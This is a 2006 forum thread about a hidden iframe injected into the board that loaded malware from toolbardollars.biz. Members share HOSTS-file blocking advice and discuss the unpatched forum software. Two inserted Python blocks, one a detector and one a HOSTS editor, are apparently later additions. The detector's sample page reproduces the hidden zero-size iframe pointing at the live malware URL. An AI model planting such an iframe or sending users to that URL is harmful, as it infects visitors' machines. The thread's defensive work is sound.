Posted: Tue Jan 31, 2006 4:41 pm
by Softpaw
On the O&M mailing list, The J.A.M discovered a spyware/virus infection in the code for the forum. Before doing anything on this site, please read my reply to him, and do NOT visit any URLs in this message:

When I accessed the actual board, I got a blocked cookie request from toolbardollars.biz; it seems that an infected file has embedded itself in the forum.

Upon viewing the source code, it seems that there's an Iframe embedded in the source code for the forum that loads http://toolbardollars.biz/dl/adv553.php (link target: http://definecynical.mancubus.net/forum ... topic=2724).

To view the site safely, add the following lines to your HOSTS file (on WinXP, it's in C:\WINDOWS\System32\drivers\etc):

127.0.0.1 toolbardollars.biz
127.0.0.1 www.toolbardollars.biz

This will prevent any access to the malicious site, and allow safe browsing until the forum is repaired. If you do not have antivirus software installed, and you've visited the Define Cynical board, please do a full system scan before viewing any sensitive data on your computer.

EDIT: This is not an isolated incident, as reported by F-Secure (http://syndicated.livejournal.com/f_secure/186317.html).

Mod Edit: changed destination of link in case foolish readers click the link anyway.
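The check Softpaw describes above (reading the page source and spotting an injected iframe) can be done without a browser rendering anything. The following is an added example, not code from the board or from any poster: it parses already-saved HTML with the standard library and reports iframes whose src points off-site or that are styled invisible or zero-size, which is how injected loaders are typically hidden. The sample page and the site hostname are constructed; the injected URL is the one named in the post.

```python
"""Find off-site or hidden iframes in saved HTML (added example, not from the thread).

Assumes the page source was already fetched and saved by something that does not
execute scripts or render frames; nothing here touches the network.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # HTMLParser lowercases attribute names; a bare attribute arrives with value None
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True for frames styled invisible or sized so small nobody would notice them."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True

    def tiny(value):
        digits = value.strip().lower()
        if digits.endswith("px"):
            digits = digits[:-2]
        return digits.isdigit() and int(digits) <= 1

    return tiny(attrs.get("width", "")) and tiny(attrs.get("height", ""))


def find_suspicious_iframes(html, site_host):
    """Return findings for iframes that load from another host or are hidden.

    site_host is the hostname the page legitimately belongs to; relative src
    values are treated as on-site, subdomains of site_host are allowed.
    """
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    site_host = site_host.lower()
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or site_host).lower()
        reasons = []
        if host != site_host and not host.endswith("." + site_host):
            reasons.append("off-site src host: " + host)
        if _is_hidden(attrs):
            reasons.append("hidden or zero-size frame")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed sample: a board page with one legitimate frame and one injected loader.
SAMPLE_HTML = """<html><body>
<div class="post">Welcome to the board</div>
<iframe src="/forum/poll.php" width="400" height="200"></iframe>
<iframe src="http://toolbardollars.biz/dl/adv553.php" width="0" height="0" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "definecynical.mancubus.net"):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

Run it against the saved source of each page template (index, topic view, login) rather than a single page, since an injected include usually lands in a shared footer or header.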
Posted: Tue Jan 31, 2006 6:46 pm
by Taren
Quote: (FelixSoftpaw @ Jan 31 2006, 11:41 AM)
To view the site safely, add the following lines to your HOSTS file (on WinXP, it's in C:\WINDOWS\System32\drivers\etc):
127.0.0.1 toolbardollars.biz
127.0.0.1 www.toolbardollars.biz

I just did so. This seems like serious business, and I hope it gets straightened out soon. Spammers are quite a bother.
Posted: Tue Jan 31, 2006 7:22 pm
by Richard K Niner
0.0.0.0 can be even safer than 127.0.0.1, because 0.0.0.0 refuses every connection, every time (localhost only does so until you install a web server)
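The two suggestions above (add the domain and its www. alias to the HOSTS file, and map them to 0.0.0.0 rather than 127.0.0.1 so the request fails even when a local web server is listening) are easy to get wrong by hand: duplicate lines, a missed alias, or a line appended below an existing real mapping that the resolver will never reach because the first match wins. This added example, not code from the thread or the board, does the edit idempotently. The file paths are the usual defaults and are an assumption; the sample HOSTS content is constructed.

```python
"""Idempotently sinkhole domains in a HOSTS file (added example, not from the thread).

Assumptions: the resolver uses the first matching line (true for Windows and glibc),
and the default paths below are where the file lives on the system you run this on.
"""
import sys

HOSTS_PATHS = {
    "win32": r"C:\WINDOWS\System32\drivers\etc\hosts",
    "linux": "/etc/hosts",
    "darwin": "/etc/hosts",
}
SINK = "0.0.0.0"                          # refuses every connection, no local server needed
BLACKHOLES = {"0.0.0.0", "127.0.0.1", "::1"}


def parse_hosts(text):
    """Return {hostname: address} for every active mapping, first match winning."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            mapping.setdefault(name.lower(), fields[0])
    return mapping


def with_aliases(domain):
    """The domain itself plus its www. alias, as the post above recommends."""
    name = domain.strip().strip(".").lower()
    return [name] if name.startswith("www.") else [name, "www." + name]


def add_block_entries(text, domains, sink=SINK):
    """Return (new_text, added_names, conflicting_names).

    Names already mapped to a blackhole address are left alone. Names mapped to
    some other address are reported as conflicts and not appended, because a
    later line would never take precedence over the existing one.
    """
    existing = parse_hosts(text)
    added, conflicts = [], []
    for domain in domains:
        for name in with_aliases(domain):
            current = existing.get(name)
            if current in BLACKHOLES:
                continue
            if current is not None:
                conflicts.append(name)
                continue
            existing[name] = sink
            added.append(name)
    if not added:
        return text, added, conflicts
    block = "".join(f"{sink} {name}\n" for name in added)
    sep = "" if (not text or text.endswith("\n")) else "\n"
    return text + sep + block, added, conflicts


def is_blocked(text, domain):
    """True when the HOSTS content resolves domain to a blackhole address."""
    return parse_hosts(text).get(domain.lower()) in BLACKHOLES


# Constructed sample of a stock HOSTS file before the edit.
SAMPLE_HOSTS = "# constructed sample hosts file\n127.0.0.1 localhost\n::1 localhost\n"

if __name__ == "__main__":
    write = "--write" in sys.argv
    args = [a for a in sys.argv[1:] if a != "--write"]
    path = args[0] if args else HOSTS_PATHS.get(sys.platform, "/etc/hosts")
    with open(path, encoding="utf-8") as fh:
        original = fh.read()
    updated, added, conflicts = add_block_entries(original, ["toolbardollars.biz"])
    for name in conflicts:
        print("not changed, already mapped to a non-blackhole address:", name)
    if added and write:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(updated)
    print("added:" if write else "would add (dry run, pass --write to apply):", added)
```

Running it without `--write` only reports what would change, which is the safer default for a file that needs administrator rights to edit.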
Posted: Tue Jan 31, 2006 7:31 pm
by Taren
Quote: (Richard K Niner @ Jan 31 2006, 02:22 PM)
0.0.0.0 can be even safer than 127.0.0.1, because 0.0.0.0 refuses every connection, every time (localhost only does so until you install a web server)

I did those as well, just to be safe.
Posted: Tue Jan 31, 2006 7:51 pm
by GreenReaper
I would guess that this (http://forums.invisionpower.com/index.p ... pic=204627) has something to do with it.
Posted: Tue Jan 31, 2006 7:56 pm
by Softpaw
Yes, patching would definitely help, though that doesn't seem to be a priority for the admins here (we've been hacked how many times, and still haven't patched the holes?).
Posted: Tue Jan 31, 2006 9:03 pm
by Taren
Quote: (FelixSoftpaw @ Jan 31 2006, 02:56 PM)
Yes, patching would definitely help, though that doesn't seem to be a priority for the admins here (we've been hacked how many times, and still haven't patched the holes?).

Is updating the board hard to do?
Posted: Tue Jan 31, 2006 11:27 pm
by Softpaw
Nope, unless the code has been modified, and that doesn't appear to be the case.
Posted: Wed Feb 01, 2006 12:02 am
by Ankaris
Screw virus-writers. Screw 'em in their asocial lil' ears.

Anyway, was about to make a post on this, good to see you're already aware. My AV caught it and I deleted it. Going to run a full scan, though.

Question - If my AV caught the trojan, should I make any other modifications, or is it not worth it?
Posted: Wed Feb 01, 2006 12:39 am
by GhostWay
I thought the main reason the board hasn't been updated in ages is that IPB has since become a pay-per-license based board system, starting at around version 2.0 (I think). And if memory serves, the board can't be updated to anything above v.2 unless 5h or likeafox has a subscription with IPB. Which, unless somebody here gets $70 for a one-year license or $185 for an endless license, probably isn't going to happen soon.

Granted, I could be wrong. Wouldn't be anywhere near the first time.
Posted: Wed Feb 01, 2006 3:04 am
by Zaaphod
Yay for spyware. <_<

HOSTS file modified, so all is good for me.
Posted: Wed Feb 01, 2006 4:07 am
by Softpaw
Quote: (Ankaris @ Jan 31 2006, 07:02 PM)
Question - If my AV caught the trojan, should I make any other modifications, or is it not worth it?

I'd highly recommend HOSTS-blocking the domain, since no good can come from it, and it'll prevent future attempted downloads. Aside from that, make sure you delete your cache, and you should be fine. My antivirus caught it, and I did an extensive check, with no infection (and I'm not even running XP SP2).

Quote: (GhostWay)
I thought the main reason the board hasn't been updated in ages is that IPB has since become a pay-per-license based board system, starting at around version 2.0 (I think). And if memory serves, the board can't be updated to anything above v.2 unless 5h or likeafox has a subscription with IPB. Which, unless somebody here gets $70 for a one-year license or $185 for an endless license, probably isn't going to happen soon.

I did some checking, and you're right, there isn't even an option to download the free version anymore. In which case, we should really switch to something else, because these attacks aren't going to stop simply by ignoring them. Migrating to another board isn't difficult, provided that it's something that's still being supported.
Posted: Wed Feb 01, 2006 4:51 am
by likeafox
I reset the board so, for the time being, there should be no problems. This attack is certainly something I will look into.

Felix, pray tell, what browser do you use?